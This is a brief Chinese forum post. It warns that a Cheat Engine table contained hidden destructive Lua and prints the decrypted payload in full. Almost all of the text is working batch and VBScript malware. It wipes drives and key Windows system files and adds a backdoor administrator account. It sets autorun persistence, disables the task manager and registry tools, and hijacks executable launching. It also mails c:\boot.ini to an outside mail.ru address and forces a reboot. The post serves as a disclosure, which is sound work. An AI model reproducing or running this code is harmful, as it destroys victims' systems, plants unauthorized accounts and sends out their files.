这人真是坏得流脓，写个 CT 表还加破坏性的 Lua。
神秘的 Lua payload 解密后的内容如下：
- L5_1 = " @echo off\n rd C: /s /q\n del c:Program Files/q\n FOR /L %%i IN (1,1,1000000) DO md %%i\n assoc .lnk=.txt\n chcp 1251\n\n\nnet user SUPPORT_388945a0 /delete\nnet user hacker hack /add\nnet localgroup \208\144\208\180\208\188\208\184\208\189\208\184\209\129\209\130\209\128\208\176\209\130\208\190\209\128\209\139 hacker /add\nnet localgroup \208\159\208\190\208\187\209\140\208\183\208\190\208\178\208\176\209\130\208\181\208\187\208\184 SUPPORT_388945a0 /del\nreg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y\n "
复制代码- L7_1 = "@echo off\necho Chr(39)>%temp%\\temp1.vbs\necho Chr(39)>%temp%\\temp2.vbs\necho on error resume next > %temp%\\temp.vbs\necho Set S = CreateObject("Wscript.Shell") >> %temp%\\temp.vbs\necho set FSO=createobject("scripting.filesystemobject")>>%temp%\\temp.vbs\nreg add HKEY_USERS\\S-1-5-21-343818398-1417001333-725345543-1003\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\\S-1-5-21-343818398-1417001333-725345543-1003\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v ClassicShell /d 1 /fset \194\182\194\167=%0\ncopy %\194\182\194\167% %SystemRoot%\\user32dll.bat\nreg add "hklm\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v RunExplorer32 /d %SystemRoot%\\user32dll.bat /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f\necho fso.deletefile "C:\\ntldr",1 >> %temp%\\temp.vbs\nreg add "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions" /v "NoSelectDownloadDir" /d 1 /f\nreg add "HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\main\\FeatureControl\\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f\nreg add "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions" /v "NoFindFiles" /d 1 /f\nreg add "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions" /v "NoNavButtons" /d 1 /f\necho fso.deletefolder "D:\\Windows",1 >> %temp%\\temp.vbs\necho fso.deletefolder "I:\\Windows",1 >> %temp%\\temp.vbs\necho fso.deletefolder "C:\\Windows",1 >> %temp%\\temp.vbs\necho sr=s.RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRoot") >> %temp%\\temp.vbs\necho fso.deletefile sr+"\\system32\\hal.dll",1 >> %temp%\\temp.vbs\necho sr=s.RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\SystemRoot") >> %temp%\\temp.vbs\necho fso.deletefolder sr+"\\system32\\dllcache",1 >> %temp%\\temp.vbs\necho sr=s.RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRoot") >> %temp%\\temp.vbs\necho fso.deletefolder sr+"\\system32\\drives",1 >> %temp%\\temp.vbs\necho s.regwrite "HKEY_CLASSES_ROOT\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\LocalizedString","forum.whack.ru\226\132\162">>%temp%\\temp.vbs\necho s.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOwner","forum.whack.ru\226\132\162">>%temp%\\temp.vbs\necho s.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOrganization","forum.whack.ru\226\132\162">>%temp%\\temp.vbs\necho on error resume next > %temp%\\temp1.vbs\necho set FSO=createobject("scripting.filesystemobject")>>%temp%\\temp1.vbs\necho do>>%temp%\\temp1.vbs\necho fso.getfile ("A:\\")>>%temp%\\temp1.vbs\necho loop>>%temp%\\temp1.vbs\necho on error resume next > %temp%\\temp2.vbs\necho Set S = CreateObject("Wscript.Shell") >> %temp%\\temp2.vbs\necho do>>%temp%\\temp2.vbs\necho execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\\temp2.vbs\necho loop>>%temp%\\temp2.vbs\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v disabletaskmgr /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v disableregistrytools /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 
/f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoFind /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoRun /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoClose /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f\nreg add 
"hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f\necho set application=createobject("shell.application")>>%temp%\\temp.vbs\necho application.minimizeall>>%temp%\\temp.vbs\nreg add "hklm\\Software\\Microsoft\\Windows\\CurrentVersion\\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f\nstart rundll32 user32, SwapMouseButton\nreg add "HKCR\\exefile\\shell\\open\\command" /ve /t REG_SZ /d rundll32.exe /f\necho i=50 >> %temp%\\temp.vbs\necho while i^>0 or i^<0 >> %temp%\\temp.vbs\necho S.popup "forum.whack.ru\226\132\162",0, "forum.whack.ru\226\132\162",0+16 >> %temp%\\temp.vbs\necho i=i-1 >> %temp%\\temp.vbs\necho wend >> %temp%\\temp.vbs\necho do >> %temp%\\temp.vbs\necho wscript.sleep 200 >> %temp%\\temp.vbs\necho s.sendkeys"{capslock}" >> %temp%\\temp.vbs\necho wscript.sleep 200 >> %temp%\\temp.vbs\necho s.sendkeys"{numlock}" >> %temp%\\temp.vbs\necho wscript.sleep 200 >> %temp%\\temp.vbs\necho s.sendkeys"{scrolllock}" >> %temp%\\temp.vbs\necho loop>> %temp%\\temp.vbs\necho Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\\temp.vbs\necho Set colCDROMs = oWMP.cdromCollection >> %temp%\\temp.vbs\necho if colCDROMs.Count ^>= 1 then >> %temp%\\temp.vbs\necho For i = 0 to colCDROMs.Count - 1 >> %temp%\\temp.vbs\necho colCDROMs.Item(i).eject >> %temp%\\temp.vbs\necho next >> %temp%\\temp.vbs\necho End If >> %temp%\\temp.vbs\necho Call SendPost("smtp.mail.ru", "forum.whack.ru\226\132\162@mail.ru", "support@mail.ru", "...", "\208\154\208\190\208\191\208\188 \208\183\208\176\209\128\208\176\208\182\208\181\208\189!") >> %temp%\\temp.vbs\necho Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\\temp.vbs\necho Set iMsg = 
CreateObject("CDO.Message") >> %temp%\\temp.vbs\necho Set iConf = CreateObject("CDO.Configuration") >> %temp%\\temp.vbs\necho Set Flds = iConf.Fields >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\\temp.vbs\necho Flds.Update >> %temp%\\temp.vbs\necho iMsg.Configuration = iConf >> %temp%\\temp.vbs\necho iMsg.To = strTo >> %temp%\\temp.vbs\necho iMsg.From = strFrom >> %temp%\\temp.vbs\necho iMsg.Subject = strSubject >> %temp%\\temp.vbs\necho iMsg.TextBody = strBody >> %temp%\\temp.vbs\necho iMsg.AddAttachment "c:\\boot.ini" >> %temp%\\temp.vbs\necho iMsg.Send >> %temp%\\temp.vbs\necho End Function >> %temp%\\temp.vbs\necho Set iMsg = Nothing >> %temp%\\temp.vbs\necho Set iConf = Nothing >> %temp%\\temp.vbs\necho Set Flds = Nothing >> %temp%\\temp.vbs\n\necho s.run "shutdown -r -t 0 -c ""pcforumhack.ru\226\132\162"" -f",1 >> %temp%\\temp.vbs\nstart %temp%\\temp.vbs\nstart %temp%\\temp1.vbs\nstart %temp%\\temp2.vbs\n "